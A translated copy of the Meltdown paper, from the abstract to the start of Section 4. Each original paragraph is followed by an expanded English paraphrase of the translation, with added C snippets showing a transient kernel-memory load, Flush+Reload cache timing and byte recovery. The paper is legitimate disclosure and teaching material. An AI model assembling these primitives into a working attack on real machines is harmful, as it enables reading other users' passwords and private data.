Meltdown: Reading Kernel Memory from User Space (paper translation)

Abstract

The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, we present Meltdown. Meltdown exploits side effects of out-of-order execution on modern processors to read arbitrary kernel-memory locations including personal data and passwords. Out-of-order execution is an indispensable performance feature and present in a wide range of modern processors. The attack is independent of the operating system, and it does not rely on any software vulnerabilities. Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation. On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer. We show that the KAISER defense mechanism for KASLR [8] has the important (but inadvertent) side effect of impeding Meltdown. We stress that KAISER must be deployed immediately to prevent large-scale exploitation of this severe information leakage.
Memory isolation is the foundation of computer system security; for example, kernel address ranges are marked as protected, and a user-mode read or write of a kernel address triggers an exception, blocking the access. In this paper we describe in detail a hardware vulnerability called Meltdown. Meltdown exploits a side effect of out-of-order execution on modern processors to let a user-mode program read data in kernel space, including personal data and passwords. Because it improves performance, out-of-order execution is widely adopted in modern processors. The Meltdown attack is independent of the operating system and does not rely on any software vulnerability. The security guarantees provided by address-space isolation are mercilessly shattered by Meltdown (paravirtualized environments as well), so every security mechanism built on address-space isolation is no longer safe. On affected systems, Meltdown lets an attacker read the data of other processes, or of other virtual machines in the cloud, without the corresponding permissions. This paper also shows that KAISER (originally designed to defend KASLR against side-channel attacks) happens to prevent the Meltdown attack. We therefore strongly recommend that KAISER be deployed immediately to prevent large-scale, severe information leakage.

1. Introduction

A central security feature of today's operating systems is memory isolation. Operating systems ensure that user applications cannot access each other's memories and prevent user applications from reading or writing kernel memory. This isolation is a cornerstone of our computing environments and allows running multiple applications on personal devices or executing processes of multiple users on a single machine in the cloud.
One of the core security features of today's operating systems is memory isolation. Memory isolation means the operating system must ensure that user applications cannot access each other's memory, and it also prevents user applications from accessing kernel space. On personal devices, multiple processes run in parallel and must be isolated from one another. In a cloud computing environment, processes of multiple users (virtual machines) coexist on the same physical host, and one user's (virtual machine's) processes must not be able to access another's data. This isolation is therefore a cornerstone of our computing environments.
On modern processors, the isolation between the kernel and user processes is typically realized by a supervisor bit of the processor that defines whether a memory page of the kernel can be accessed or not. The basic idea is that this bit can only be set when entering kernel code and it is cleared when switching to user processes. This hardware feature allows operating systems to map the kernel into the address space of every process and to have very efficient transitions from the user process to the kernel, e.g., for interrupt handling. Consequently, in practice, there is no change of the memory mapping when switching from a user process to the kernel.
On modern processors, the isolation of the kernel and user address spaces is usually implemented by a bit in a processor control register (the supervisor bit, which identifies the processor's current mode) that defines whether the memory pages of kernel space may be accessed. The basic idea is that this bit is set while kernel code executes and cleared when switching to a user process. With this hardware feature, the operating system can map the kernel address space into every process. While a user process runs, it frequently needs to switch from user space to kernel space, for example when it requests a kernel service through a system call, or when an interrupt arrives and the kernel's interrupt handler must run to service asynchronous events from peripherals. Given how frequently the CPU switches from user mode to kernel mode, not having to switch address spaces on each transition keeps system performance from suffering.
In this work, we present Meltdown. Meltdown is a novel attack that allows overcoming memory isolation completely by providing a simple way for any user process to read the entire kernel memory of the machine it executes on, including all physical memory mapped in the kernel region. Meltdown does not exploit any software vulnerability, i.e., it works on all major operating systems. Instead, Meltdown exploits side-channel information available on most modern processors, e.g., modern Intel microarchitectures since 2010 and potentially on other CPUs of other vendors.
While side-channel attacks typically require very specific knowledge about the target application and are tailored to only leak information about its secrets, Meltdown allows an adversary who can run code on the vulnerable processor to obtain a dump of the entire kernel address space, including any mapped physical memory. The root cause of the simplicity and strength of Meltdown are side effects caused by out-of-order execution.
In this work, we present a new attack exploiting the Meltdown vulnerability, by which any user process can break the operating system's address-space isolation and, in a simple way, read data in kernel space, including all physical memory mapped into the kernel address space. Meltdown does not rely on any software vulnerability, which means it works against any operating system. Instead, it exploits side-channel information available on most modern processors (such as Intel microarchitectures since 2010; CPUs of other vendors may harbor the same problem). An ordinary side-channel attack needs detailed information about the attack target and a specific attack method tailored to that information in order to obtain secret data. The Meltdown attack is different: it can dump the data of the entire kernel address space (including all physical memory mapped there). Meltdown's power and simplicity have a single root cause: the side effects of out-of-order execution.
Out-of-order execution is an important performance feature of today’s processors in order to overcome latencies of busy execution units, e.g., a memory fetch unit needs to wait for data arrival from memory. Instead of stalling the execution, modern processors run operations out-of-order i.e., they look ahead and schedule subsequent operations to idle execution units of the processor. However, such operations often have unwanted side-effects, e.g., timing differences [28, 35, 11] can leak information from both sequential and out-of-order execution.
Sometimes a CPU execution unit has to wait for a result, for example when loading data from memory into a register. To improve performance, rather than stalling, the CPU executes out of order: it continues with subsequent instructions and dispatches them to idle execution units. However, such execution often has unwanted side effects, and through these side effects, e.g., timing differences [28, 35, 11], we can steal information.
From a security perspective, one observation is particularly significant: out-of-order execution on vulnerable CPUs allows an unprivileged process to load data from a privileged (kernel or physical) address into a temporary CPU register. Moreover, the CPU even performs further computations based on this register value, e.g., access to an array based on the register value. The processor ensures correct program execution, by simply discarding the results of the memory lookups (e.g., the modified register states), if it turns out that an instruction should not have been executed. Hence, on the architectural level (e.g., the abstract definition of how the processor should perform computations), no security problem arises.
Although performance improves, there is a problem from a security point of view. The key point is that under out-of-order execution, a vulnerable CPU lets an unprivileged process read data from an address that requires privileged access and load it into a temporary register. The CPU may even perform further computations based on the value of this register, for example indexing an array with it. The CPU does eventually detect the illegal access and discards the results of the computation (for example, the modified register values). So although the instructions after the exception were executed ahead of time, the CPU unwinds their results in the end, and it looks as though nothing happened. This guarantees that there is no security problem from the perspective of the CPU architecture.
However, we observed that out-of-order memory lookups influence the cache, which in turn can be detected through the cache side channel. As a result, an attacker can dump the entire kernel memory by reading privileged memory in an out-of-order execution stream, and transmit the data from this elusive state via a microarchitectural covert channel (e.g., Flush+Reload) to the outside world. On the receiving end of the covert channel, the register value is reconstructed. Hence, on the microarchitectural level (e.g., the actual hardware implementation), there is an exploitable security problem.
However, we can observe the impact of out-of-order execution on the caches, and mount attacks based on the side-channel information the caches provide. The attack proceeds as follows: the attacker uses the CPU's out-of-order execution to read a memory address that requires privileged access and load its contents into a temporary register. The program then uses the value in that register to influence the state of the cache. The attacker next builds a covert channel (for example, Flush+Reload) to transmit the data and reconstructs the register value at the channel's receiving end. Therefore, at the level of the CPU microarchitecture (the actual CPU hardware implementation) there is indeed an exploitable security problem.
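The mechanism just described can be sketched in a few lines of C. This is only an illustration, not the paper's attack code: kernel_ptr and probe_array are hypothetical names, and a real exploit additionally needs the exception handling and cache probing described later.

```c
#include <stdint.h>

/* Hypothetical names for illustration only: kernel_ptr points at a kernel
 * address, probe_array is a user-space array spanning 256 pages. */
extern volatile uint8_t *kernel_ptr;
extern uint8_t probe_array[256 * 4096];

void transient_leak(void) {
    /* Architecturally, this load faults: the page is kernel-only.
     * Microarchitecturally, it may still execute out of order and place
     * the secret byte in a temporary register. */
    uint8_t secret = *kernel_ptr;

    /* Transient dependent access: touches one of 256 pages and leaves a
     * cache footprint that survives after the results are squashed. */
    volatile uint8_t tmp = probe_array[secret * 4096];
    (void)tmp;
}
```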
Meltdown breaks all security assumptions given by the CPU’s memory isolation capabilities. We evaluated the attack on modern desktop machines and laptops, as well as servers in the cloud. Meltdown allows an unprivileged process to read data mapped in the kernel address space, including the entire physical memory on Linux and OS X, and a large fraction of the physical memory on Windows. This may include physical memory of other processes, the kernel, and in case of kernel-sharing sandbox solutions (e.g., Docker, LXC) or Xen in paravirtualization mode, memory of the kernel (or hypervisor), and other co-located instances. While the performance heavily depends on the specific machine, e.g., processor speed, TLB and cache sizes, and DRAM speed, we can dump kernel and physical memory with up to 503KB/s. Hence, an enormous number of systems are affected.
The kernel isolation the CPU works so hard to provide is easily broken by Meltdown. We ran the attack on modern desktops, laptops, and cloud servers. On systems such as Linux and OS X, Meltdown lets a user process dump all physical memory (since all physical memory is mapped into the kernel address space); on Windows, it lets the user process dump a large fraction of physical memory. This memory may contain data of other processes or of the kernel. Under kernel-sharing sandbox solutions (such as Docker or LXC) or Xen in paravirtualization mode, the dumped memory also includes data of the kernel (i.e., the hypervisor) and of other guest OSes. Depending on the system (processor speed, TLB and cache sizes, DRAM speed), the dump rate can reach 503 KB/s. The impact of Meltdown is therefore very wide-ranging.
The countermeasure KAISER [8], originally developed to prevent side-channel attacks targeting KASLR, inadvertently protects against Meltdown as well. Our evaluation shows that KAISER prevents Meltdown to a large extent. Consequently, we stress that it is of utmost importance to deploy KAISER on all operating systems immediately. Fortunately, during a responsible disclosure window, the three major operating systems (Windows, Linux, and OS X) implemented variants of KAISER and will roll out these patches in the near future.
The countermeasure is KAISER [8], which was originally designed to defend against side-channel attacks targeting KASLR but, unintentionally, also defeats Meltdown. Our evaluation shows that KAISER prevents Meltdown to a large extent, so we strongly recommend deploying it on all operating systems immediately. Fortunately, the three major operating systems (Windows, Linux, and OS X) have all implemented variants of KAISER and will roll out these patches in the near future.
Meltdown is distinct from the Spectre attacks [19] in several ways, notably that Spectre requires tailoring to the victim process's software environment, but applies more broadly to CPUs and is not mitigated by KAISER.
Meltdown and Spectre attacks [19] differ in several ways. The most obvious difference is that launching a Spectre attack requires understanding the software environment of the victim process and tailoring the attack to that information. On the other hand, more CPUs are affected by Spectre, and KAISER is ineffective against it.
Contributions. The contributions of this work are:

  1. We describe out-of-order execution as a new, extremely powerful, software-based side channel.
  2. We show how out-of-order execution can be combined with a microarchitectural covert channel to transfer the data from an elusive state to a receiver on the outside.
  3. We present an end-to-end attack combining out-of-order execution with exception handlers or TSX, to read arbitrary physical memory without any permissions or privileges, on laptops, desktop machines, and on public cloud machines.
  4. We evaluate the performance of Meltdown and the effects of KAISER on it.
The contributions of this work are:
  1. We show for the first time that out-of-order execution can be used as a side channel for attacks, and an extremely powerful one.
  2. We show how out-of-order execution can be combined with a microarchitectural covert channel to transfer data and leak information.
  3. We present an end-to-end attack method using out-of-order execution (combined with exception handling or TSX). With it, we read arbitrary physical memory on laptops, desktops, and cloud servers without any permissions or privileges.
  4. We evaluate the performance of Meltdown and the effect of KAISER on it.
Outline. The remainder of this paper is structured as follows: In Section 2, we describe the fundamental problem which is introduced with out-of-order execution. In Section 3, we provide a toy example illustrating the side channel Meltdown exploits. In Section 4, we describe the building blocks of the full Meltdown attack. In Section 5, we present the Meltdown attack. In Section 6, we evaluate the performance of the Meltdown attack on several different systems. In Section 7, we discuss the effects of the software-based KAISER countermeasure and propose solutions in hardware. In Section 8, we discuss related work and conclude our work in Section 9.
Outline: The rest of this paper is structured as follows. Section 2 describes the fundamental problem introduced by out-of-order execution. Section 3 gives a simple example illustrating the side channel Meltdown exploits. Section 4 describes the building blocks of the Meltdown attack. Section 5 shows how the attack is carried out. Section 6 evaluates the attack's performance on several different systems. Section 7 discusses software and hardware countermeasures: the software solution is the KAISER mechanism, and we also offer suggestions for hardware solutions. Section 8 discusses related work, and Section 9 gives our conclusions.

2. Background

In this section, we provide background on out-of-order execution, address translation, and cache attacks.

2.1 Out-of-Order Execution

Out-of-order execution is an optimization technique that allows to maximize the utilization of all execution units of a CPU core as exhaustive as possible. Instead of processing instructions strictly in the sequential program order, the CPU executes them as soon as all required resources are available. While the execution unit of the current operation is occupied, other execution units can run ahead. Hence, instructions can be run in parallel as long as their results follow the architectural definition.
Out-of-order execution is an optimization technique that uses the execution units in the CPU core as fully as possible. Unlike an in-order CPU, a CPU that supports out-of-order execution does not need to execute code in program order: as soon as the resources an instruction needs are available (not occupied), it is dispatched to an execution unit. If the execution unit needed by the current instruction is busy, later instructions may run ahead of it (provided their execution units are free). Thus, under out-of-order execution, instructions run in parallel as long as the results match what the architecture defines.
In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor's out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. In this paper, we refer to speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions.
In practice, the CPU's out-of-order execution and speculative execution are bundled together. When the CPU cannot yet determine whether the next instruction must be executed, it predicts, and executes out of order along the predicted path. In this paper, speculative execution is used in a restricted sense: it refers specifically to executing the instruction sequence after a branch instruction. The term out-of-order execution means any way of executing the current instruction before the processor has committed the results of all prior instructions.
In 1967, Tomasulo [33] developed an algorithm that enabled dynamic scheduling of instructions to allow out-of-order execution. Tomasulo [33] introduced a unified reservation station that allows a CPU to use a data value as it has been computed instead of storing it to a register and re-reading it. The reservation station renames registers to allow instructions that operate on the same physical registers to use the last logical one to solve read-after-write (RAW), write-after-read (WAR) and write-after-write (WAW) hazards. Furthermore, the reservation unit connects all execution units via a common data bus (CDB). If an operand is not available, the reservation unit can listen on the CDB until it is available and then directly begin the execution of the instruction.
In 1967, Tomasulo designed an algorithm [33] that implements dynamic scheduling of instructions and thus allows out-of-order execution. Tomasulo [33] designed a unified reservation station for the CPU's execution units. Previously, execution units had to read operands from registers and write results back to registers; with the reservation station, they can read operands from it and store results to it. Consider a concrete RAW (read-after-write) example:
R2 <- R1 + R3
R4 <- R2 + R3
The first instruction computes R1 + R3 and stores the result in R2; the second instruction depends on the value of R2. Without a reservation station, the second instruction can execute only after the first instruction's result has been committed to the R2 register, because the operand must be loaded from R2. With a reservation station, register R2 can be renamed there; call the renamed register R2.rename. After the first instruction executes, its result is kept in R2.rename without committing the final result to R2, so the second instruction can fetch its operand directly from R2.rename and execute, resolving the RAW hazard. WAR and WAW are handled similarly and are not repeated here. (Translator's note: the above expands on the original sentence to make the reservation station easier to understand.) In addition, the reservation station is connected to all execution units via a common data bus (CDB). If an operand is not yet ready, an execution unit can listen on the CDB and begin executing the instruction as soon as the operand appears.
Figure 1: Simplified illustration of a single core of the Intel Skylake microarchitecture. Instructions are decoded into μOPs and executed out of order in the execution engine by individual execution units.
On the Intel architecture, the pipeline consists of the front-end, the execution engine (back-end) and the memory subsystem [14]. x86 instructions are fetched by the front-end from the memory and decoded to microoperations (μOPs) which are continuously sent to the execution engine. Out-of-order execution is implemented within the execution engine as illustrated in Figure 1. The Reorder Buffer is responsible for register allocation, register renaming and retiring. Additionally, other optimizations like move elimination or the recognition of zeroing idioms are directly handled by the reorder buffer. The μOPs are forwarded to the Unified Reservation Station that queues the operations on exit ports that are connected to Execution Units. Each execution unit can perform different tasks like ALU operations, AES operations, address generation units (AGU) or memory loads and stores. AGUs as well as load and store execution units are directly connected to the memory subsystem to process its requests.
In the Intel CPU architecture, the pipeline consists of a front end, an execution engine (back end), and a memory subsystem [14]. The front end fetches x86 instructions from memory and decodes them into micro-operations (μOPs), which are then sent to the execution engine. Out-of-order execution is implemented in the execution engine, as shown in Figure 1. The reorder buffer is responsible for register allocation, register renaming, and committing results to software-visible registers (a step also known as retirement). The reorder buffer also handles other optimizations, such as move elimination and the recognition of zeroing idioms. The μOPs are forwarded to the unified reservation station, where they queue at output ports connected to the execution units. Each execution unit performs different tasks, such as ALU operations, AES operations, address generation (AGU), or memory loads and stores. The AGUs and the load and store units are directly connected to the memory subsystem to handle its requests.
Since CPUs usually do not run linear instruction streams, they have branch prediction units that are used to obtain an educated guess of which instruction will be executed next. Branch predictors try to determine which direction of a branch will be taken before its condition is actually evaluated. Instructions that lie on that path and do not have any dependencies can be executed in advance and their results used if the prediction was correct. If the prediction was incorrect, the reorder buffer allows to rollback by clearing the reorder buffer and re-initializing the unified reservation station.
Since the CPU does not always run a linear instruction stream, it has a branch prediction unit. This unit records the outcomes of past branches and uses them to guess the next instruction likely to be executed. The branch prediction unit determines the branch path before the actual condition is evaluated. Instructions on that path can be executed early if they have no dependencies. If the prediction is correct, the results of those instructions are available immediately. If the prediction is incorrect, the reorder buffer rolls back the results, which is done by clearing the reorder buffer and re-initializing the unified reservation station.
Various approaches to predict the branch exist: With static branch prediction [12], the outcome of the branch is solely based on the instruction itself. Dynamic branch prediction [2] gathers statistics at run-time to predict the outcome. One-level branch prediction uses a 1-bit or 2-bit counter to record the last outcome of the branch [21]. Modern processors often use two-level adaptive predictors [36] that remember the history of the last n outcomes and allow to predict regularly recurring patterns. More recently, ideas to use neural branch prediction [34, 18, 32] have been picked up and integrated into CPU architectures [3].
There are various approaches to branch prediction. With static branch prediction [12], the outcome of a branch is based entirely on the instruction itself. Dynamic branch prediction [2] gathers statistics at run time to predict the outcome. One-level branch prediction uses a 1-bit or 2-bit counter to record the last outcome of a branch [21]. Modern processors usually use two-level adaptive predictors [36], which remember the history of the last n outcomes and find regularly recurring patterns in that history. More recently, the idea of neural branch prediction [34, 18, 32] has been picked up and integrated into CPU architectures [3].

2.2 Address Spaces

To isolate processes from each other, CPUs support virtual address spaces where virtual addresses are translated to physical addresses. A virtual address space is divided into a set of pages that can be individually mapped to physical memory through a multi-level page translation table. The translation tables define the actual virtual to physical mapping and also protection properties that are used to enforce privilege checks, such as readable, writable, executable and user-accessible. The currently used translation table is held in a special CPU register. On each context switch, the operating system updates this register with the next process's translation table address in order to implement per-process virtual address spaces. Because of that, each process can only reference data that belongs to its own virtual address space. Each virtual address space itself is split into a user and a kernel part. While the user address space can be accessed by the running application, the kernel address space can only be accessed if the CPU is running in privileged mode. This is enforced by the operating system disabling the user-accessible property of the corresponding translation tables. The kernel address space does not only have memory mapped for the kernel's own usage, but it also needs to perform operations on user pages, e.g., filling them with data. Consequently, the entire physical memory is typically mapped in the kernel. On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).
[Figure 2: The entire physical memory is mapped into the kernel address space via the direct-physical map at a predefined virtual offset.]
To isolate processes from each other, the CPU supports virtual address spaces, but the CPU puts physical addresses on the bus, so the virtual addresses used by a program must be translated into physical addresses. The virtual address space is divided into pages, and these pages are mapped to physical pages through multi-level page tables. Besides the virtual-to-physical mapping, the page tables also define protection attributes, such as readable, writable, executable, and user-accessible. The currently used page table is held in a special CPU register (on x86 this register is CR3; on ARM it is the TTBR family of registers). On a context switch, the operating system updates this register with the page table address of the next process, thereby switching the process's virtual address space. As a result, each process can only access data belonging to its own virtual address space. The virtual address space of each process is itself divided into a user part and a kernel part. When a process runs in user mode, it can only access the user address space; only in kernel mode (the CPU's privileged mode) can it access the kernel address space. The operating system disables the user-accessible attribute in the page tables covering the kernel address space, thereby forbidding user-mode access to kernel space. The kernel address space not only maps memory for the kernel's own use (such as the kernel's text and data segments) but also needs to operate on user pages, for example to fill them with data. Therefore, the entire system's physical memory is usually mapped in the kernel address space. On Linux and OS X this is done with a direct-physical map, that is, the entire physical memory is mapped directly to predefined virtual addresses (see Figure 2).
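As a concrete illustration of the direct-physical map just described, the mapping is simply a fixed offset. This is a sketch: the PAGE_OFFSET constant below is the classic (pre-KASLR) x86-64 value and is an assumption for illustration, not taken from the paper.

```c
#include <stdint.h>

/* Hedged sketch of the Linux direct-physical map. PAGE_OFFSET is the
 * kernel's base address for the map; this value is the traditional x86-64
 * default and is assumed here for illustration. */
#define PAGE_OFFSET 0xffff880000000000ULL

static inline uint64_t phys_to_virt(uint64_t phys) {
    /* From kernel mode, every physical address is also reachable at this
     * predefined virtual address. */
    return PAGE_OFFSET + phys;
}
```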
Instead of a direct-physical map, Windows maintains multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.
(Translator's note: the details of the Windows address-mapping mechanism are not covered further here.)
The exploitation of memory corruption bugs often requires the knowledge of addresses of specific data. In order to impede such attacks, address space layout randomization (ASLR) has been introduced as well as nonexecutable stacks and stack canaries. In order to protect the kernel, KASLR randomizes the offsets where drivers are located on every boot, making attacks harder as they now require to guess the location of kernel data structures. However, side-channel attacks allow to detect the exact location of kernel data structures [9, 13, 17] or derandomize ASLR in JavaScript [6]. A combination of a software bug and the knowledge of these addresses can lead to privileged code execution.
Exploiting memory corruption bugs (bugs that corrupt memory contents, e.g., causing crashes) usually requires knowing the address of specific data (since that is the data to be modified). To impede such attacks, address space layout randomization (ASLR), non-executable stacks, and stack canaries were introduced. To protect the kernel, KASLR randomizes the offsets at which drivers are located on every boot, making attacks harder because the attacker must now guess the location of kernel data structures. However, side-channel attacks can determine the exact location of kernel data structures [9, 13, 17] or derandomize ASLR in JavaScript [6]. Combining a software bug with knowledge of these addresses can lead to privileged code execution.

2.3 Cache Attacks

In order to speed-up memory accesses and address translation, the CPU contains small memory buffers, called caches, that store frequently used data. CPU caches hide slow memory access latencies by buffering frequently used data in smaller and faster internal memory. Modern CPUs have multiple levels of caches that are either private to its cores or shared among them. Address space translation tables are also stored in memory and are also cached in the regular caches.
To speed up memory accesses and address translation, the CPU contains small memory buffers, called caches, that store recently and frequently used data. The CPU cache thereby hides the access latency of the slower underlying memory. Modern CPUs have multiple levels of caches, which either belong to a specific CPU core or are shared among several cores. The page tables of the address space are stored in memory and are likewise cached (translator's note: address translations themselves are cached in the TLB).
Cache side-channel attacks exploit timing differences that are introduced by the caches. Different cache attack techniques have been proposed and demonstrated in the past, including Evict+Time [28], Prime+Probe [28, 29], and Flush+Reload [35]. Flush+Reload attacks work on a single cache line granularity. These attacks exploit the shared, inclusive last-level cache. An attacker frequently flushes a targeted memory location using the clflush instruction. By measuring the time it takes to reload the data, the attacker determines whether data was loaded into the cache by another process in the meantime. The Flush+Reload attack has been used for attacks on various computations, e.g., cryptographic algorithms [35, 16, 1], web server function calls [37], user input [11, 23, 31], and kernel addressing information [9].
A cache side-channel attack exploits the timing differences introduced by the caches: cached data is accessed quickly, while uncached data is accessed slowly, and the attack uses this difference to steal data. Various cache attack techniques have been proposed and demonstrated, including Evict+Time [28], Prime+Probe [28, 29], and Flush+Reload [35]. Flush+Reload works at the granularity of a single cache line. These attacks mainly exploit the shared, inclusive last-level cache. The attacker repeatedly flushes a targeted memory location with the clflush instruction, then reloads the data while measuring how long the load takes. From this timing, the attacker learns whether another process loaded the data into the cache in the meantime. Flush+Reload attacks have been used against many targets, for example cryptographic algorithms [35, 16, 1], web server function calls [37], user input [11, 23, 31], and kernel addressing information [9].
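The Flush+Reload primitive itself is small. Below is a minimal sketch using GCC/Clang x86 intrinsics; the hit/miss threshold is machine-specific and must be calibrated, and the function names are our own.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Flush phase: evict the target line, so a later fast access implies that
 * some other code loaded it into the cache in the meantime. */
void flush(const void *addr) {
    _mm_clflush(addr);
}

/* Reload phase: time a single access to the target address, in cycles.
 * A small result means a cache hit; the threshold is machine-specific. */
uint64_t reload_time(const volatile uint8_t *addr) {
    unsigned int aux;
    _mm_mfence();                      /* order the timed load */
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                       /* the measured memory access */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}
```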
A special use case are covert channels. Here the attacker controls both, the part that induces the side effect, and the part that measures the side effect. This can be used to leak information from one security domain to another, while bypassing any boundaries existing on the architectural level or above. Both Prime+Probe and Flush+Reload have been used in high-performance covert channels [24, 26, 10].
A special use case of cache side-channel attacks is to construct covert channels. In this scenario, the attacker controls both the sender and the receiver of the covert channel: the attacker's program triggers the cache side effect, and the attacker also measures that side effect. In this way, information can leak from one security domain to the outside world, bypassing boundary checks at the architectural level and above. Both Prime+Probe and Flush+Reload have been used to build high-performance covert channels [24, 26, 10].

3. A Toy Example

In this section, we start with a toy example, a simple code snippet, to illustrate that out-of-order execution can change the microarchitectural state in a way that leaks information. However, despite its simplicity, it is used as a basis for Section 4 and Section 5, where we show how this change in state can be exploited for an attack.
In this section, we give a simple example and show how, executed on an out-of-order CPU, this example code changes the CPU's microarchitectural state and leaks information. Despite its simplicity, it serves as the basis for Sections 4 and 5, where we demonstrate the Meltdown attack in detail.
Listing 1 shows a simple code snippet first raising an (unhandled) exception and then accessing an array. The property of an exception is that the control flow does not continue with the code after the exception, but jumps to an exception handler in the operating system. Regardless of whether this exception is raised due to a memory access, e.g., by accessing an invalid address, or due to any other CPU exception, e.g., a division by zero, the control flow continues in the kernel and not with the next user space instruction.
[Listing 1: A toy code snippet that raises an (unhandled) exception and then accesses probe_array based on the value of data.]
The listing above shows a simple code snippet: first trigger an exception (which we do not handle), then access the probe_array array. The exception causes the control flow to skip the code after the exception and jump to an exception handler in the operating system. Regardless of whether the exception is caused by a memory access (such as accessing an invalid address) or by another kind of CPU exception (such as a division by zero), the control flow continues in the kernel rather than going on to the user-space instruction that accesses probe_array.
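Since the listing itself did not survive extraction as text, here is a reconstruction of the snippet as the surrounding paragraphs describe it: raise an exception, then access probe_array indexed by data * 4096. raise_exception() and access() are pseudocode placeholders, not real library calls.

```c
raise_exception();
/* the line below is never reached architecturally */
access(probe_array[data * 4096]);
```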
Thus, our toy example cannot access the array in theory, as the exception immediately traps to the kernel and terminates the application. However, due to the out-of-order execution, the CPU might have already executed the following instructions as there is no dependency on the exception. This is illustrated in Figure 3. Due to the exception, the instructions executed out of order are not retired and, thus, never have architectural effects.
[Figure 3: Out-of-order execution runs ahead of the faulting instruction; when the exception is raised, the transient instructions' results are discarded rather than retired.]
Therefore, the sample code above should, in theory, never access the probe_array array; after all, the exception immediately traps to the kernel and terminates the application. But because of out-of-order execution, the CPU may already have executed the instructions following the faulting one, given that they have no dependency on it, as illustrated in Figure 3. Although the instructions after the faulting instruction were executed, they are not retired because of the exception. (Translator's note: instruction retire and instruction commit mean the same thing, namely that the instruction's result becomes visible in software-visible registers or memory; since "retire" is easily misunderstood in translation, this article renders it as "commit" or leaves it untranslated.) So from the perspective of the CPU architecture there is no problem; viewed through the ISA, software never sees these instructions execute.
Although the instructions executed out of order do not have any visible architectural effect on registers or memory, they have microarchitectural side effects. During the out-of-order execution, the referenced memory is fetched into a register and is also stored in the cache. If the out-of-order execution has to be discarded, the register and memory contents are never committed. Nevertheless, the cached memory contents are kept in the cache. We can leverage a microarchitectural side-channel attack such as Flush+Reload [35], which detects whether a specific memory location is cached, to make this microarchitectural state visible. There are other side channels as well which also detect whether a specific memory location is cached, including Prime+Probe [28, 24, 26], Evict+ Reload [23], or Flush+Flush [10]. However, as Flush+ Reload is the most accurate known cache side channel and is simple to implement, we do not consider any other side channel for this example.
Although the program order is violated and instructions that should not run are executed on the CPU, from the perspective of registers and memory we cannot observe any change caused by these instructions (that is, there is no architectural effect). From the perspective of the CPU microarchitecture, however, there are indeed side effects. During out-of-order execution, loading a memory value into a register also stores that value in the cache. If the results of the out-of-order execution must be discarded, neither the register nor the memory values are committed. The cached contents, however, are not discarded; they stay in the cache. At this point we can use a microarchitectural side-channel attack, such as Flush+Reload [35], to detect whether a given memory address is cached, making this microarchitectural state visible to the user. There are other methods to detect whether a memory address is cached, including Prime+Probe [28, 24, 26], Evict+Reload [23], and Flush+Flush [10]. However, Flush+Reload is the most accurate known cache side channel and is simple to implement, so in this article we mainly use Flush+Reload.
Based on the value of data in this toy example, a different part of the cache is accessed when executing the memory access out of order. As data is multiplied by 4096, data accesses to probe array are scattered over the array with a distance of 4 kB (assuming an 1 B data type for probe array). Thus, there is an injective mapping from the value of data to a memory page, i.e., there are no two different values of data which result in an access to the same page. Consequently, if a cache line of a page is cached, we know the value of data. The spreading over different pages eliminates false positives due to the prefetcher, as the prefetcher cannot access data across page boundaries [14].
Let us return to the example code in the listing above. probe_array is organized in 4 KB units, and varying the data variable in steps of the 4 KB size traverses the array. If, during out-of-order execution, the 4 KB block of probe_array selected by data is accessed, the corresponding page (that 4 KB block of probe_array) is loaded into the cache. Therefore, the value of data can be deduced by scanning the cache state of every page of probe_array (data values and pages of probe_array correspond one to one). On Intel processors, the prefetcher does not cross page boundaries, so the cache state of each page is completely independent. Spreading the cache probes across several pages mainly prevents false positives caused by the prefetcher.
Figure 4 shows the result of a Flush+Reload measurement iterating over all pages, after executing the out-of-order snippet with data = 84. Although the array access should not have happened due to the exception, we can clearly see that the index which would have been accessed is cached. Iterating over all pages (e.g., in the exception handler) shows only a cache hit for page 84. This shows that even instructions which are never actually executed change the microarchitectural state of the CPU. Section 4 modifies this toy example to not read a value, but to leak an inaccessible secret.
[Figure 4: Flush+Reload access times for all 256 pages of probe_array after executing the snippet with data = 84; only page 84 shows a cache hit.]
The figure above plots, for each page of probe_array, the access time measured with the Flush+Reload method. The x-axis is the page index (256 in total) and the y-axis is the access time. On a cache miss, the access takes about 400 cycles; on a cache hit, about 200 cycles, a clearly visible difference. From the figure we can see that, although the access to probe_array should never happen because of the exception, there is an obvious cache hit at data = 84. This shows that under out-of-order execution, instructions that should never execute still affect the CPU's microarchitectural state. In the following sections, we modify this sample code to steal secret data.
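Putting the probe together with the 256-page layout, the receiving side can be sketched as follows. reload_time() is the Flush+Reload probe sketched in Section 2.3, and CACHE_HIT_THRESHOLD is an assumed cut-off between the roughly 200-cycle hits and 400-cycle misses of Figure 4; both must be calibrated on a real machine.

```c
#include <stdint.h>

/* Assumed cut-off between hits (~200 cycles) and misses (~400 cycles). */
#define CACHE_HIT_THRESHOLD 300

/* The Flush+Reload probe sketched in Section 2.3. */
extern uint64_t reload_time(const volatile uint8_t *addr);

/* Scan all 256 pages and report the one that hits in the cache. */
int recover_value(const uint8_t probe_array[256 * 4096]) {
    for (int i = 0; i < 256; i++) {
        if (reload_time(&probe_array[i * 4096]) < CACHE_HIT_THRESHOLD)
            return i;   /* e.g., 84 for the run shown in Figure 4 */
    }
    return -1;          /* no page was cached */
}
```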

4. Building Blocks of the Attack

The toy example in Section 3 illustrated that side-effects of out-of-order execution can modify the microarchitectural state to leak information. While the code snippet reveals the data value passed to a cache-side channel, we want to show how this technique can be leveraged to leak otherwise inaccessible secrets. In this section, we want to generalize and discuss the necessary building blocks to exploit out-of-order execution for an attack.
